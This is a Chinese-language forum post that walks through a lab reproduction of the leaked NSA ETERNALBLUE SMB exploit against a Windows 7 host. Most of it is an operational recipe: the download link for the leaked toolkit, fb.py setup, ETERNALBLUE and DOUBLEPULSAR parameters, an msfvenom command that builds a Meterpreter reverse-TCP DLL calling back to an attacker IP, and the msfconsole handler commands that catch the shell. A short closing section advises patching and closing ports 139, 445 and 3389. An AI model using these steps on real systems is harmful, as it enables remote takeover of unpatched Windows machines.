Shadow Brokers再次泄露出一份震惊世界的机密文档,其中包含了多个精美的 Windows 远程漏洞利用工具,可以覆盖大量的 Windows 服务器,一夜之间所有Windows服务器几乎全线暴露在危险之中。
  目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000(没错,古董也支持)、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。  
  工具中的ETERNALBLUE模块是SMB 漏洞利用程序,可以攻击开放了 445 端口的 Windows 机器,本文进行了漏洞利用复现:
1.NSA泄露工具下载地址:
https://github.com/x0rz/EQGRP_Lost_in_Translation
2.安装方法
环境搭建
注意,必须按照python2.6相关版本,其他版本不奏效。
下载python2.6并安装
下载pywin32并安装
将C:\Python26添加到环境变量PATH中。
配置环境   将EQGRP_Lost_in_Translation下载到的文件解压,找到\windows\fb.py,将,下图中两个部分注释掉。

  1. 实验环境
    攻击机1:192.168.71.133,winserver 2008,32bit

攻击机2:192.168.71.130 kali2

靶机:192.168.199.107,win7 64bit

  1. 利用步骤:
    在靶机1(192.168.71.133)中安装好python、pywin32以及NSA工具,在C:\shadowbroker-master\windows 中执行fb.py:

分别设置攻击IP地址192.168.199.107,回调地址192.168.71.133(攻击机1),关闭重定向,设置日志路径,新建或选择一个project:

接下来输入命令:
useETERNALBLUE
依次填入相关参数,超时时间等默认参数可以直接回车:

由于靶机是win7 系统,在目标系统信息处选择1:win72k8r2

模式选1:FB

确认信息,执行

成功后,接着运行use Doublepulsar:

并依次填入参数,注意在function处选择2,rundll

同时在攻击机2 kali的msfvenom 生成攻击dll:
msfvenom -pwindows/x64/meterpreter/reverse_tcp LHOST=192.168.71.130LPORT=5555 -f dll > go.dll

接着执行:
$ msfconsole
msf > useexploit/multi/handler
msf > set LHOST192.168.71.130
msf > set LPORT 5555
msf > set PAYLOADwindows/x64/meterpreter/reverse_tcp
msf > exploit

同时将生成的go.dll上传到攻击机1(192.168.71.133),回到攻击机1,填入攻击dll路径:

接下来一路回车,执行攻击

回到kali,获得shell,攻击成功:

5.缓解措施
  微软表示已经修补了Shadow Brokers小组发布的Windows漏洞。可能源于国家安全局的黑客工具昨天在线发布,微软能够测试并确认修补程序已经可用于所有当前支持的Windows版本。这意味着较旧的Windows XP或Windows Vista系统仍然可能容易受到发布的三个漏洞的攻击,但是由于Microsoft已经不支持,因此Microsoft不太可能为这些旧版本的Windows提供补丁。
  请大家及时更新补丁,并关闭必要的139,445,3389端口。

点击收藏 | 0 关注 | 0
登录 后跟帖